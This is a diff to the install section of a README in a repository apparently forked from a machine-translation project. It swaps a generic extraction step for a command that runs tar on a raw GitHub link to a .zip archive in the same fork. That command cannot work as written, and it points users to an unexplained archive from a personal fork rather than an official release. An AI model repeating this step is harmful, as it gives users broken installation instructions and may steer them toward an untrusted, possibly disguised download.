saidzy7/Marco-MT/README.md

 - **For Linux:**
   1. Open a terminal.
   2. Navigate to the download location.
-  3. Run the command: `tar -xvf yourfile.tar.gz` to extract it.
+  3. Run the command: `tar -xvf https://raw.githubusercontent.com/saidzy7/Marco-MT/master/Marco-MT-Algharb/Marco-MT_v2.5.zip` to extract it.

 ### 5. Run Marco-MT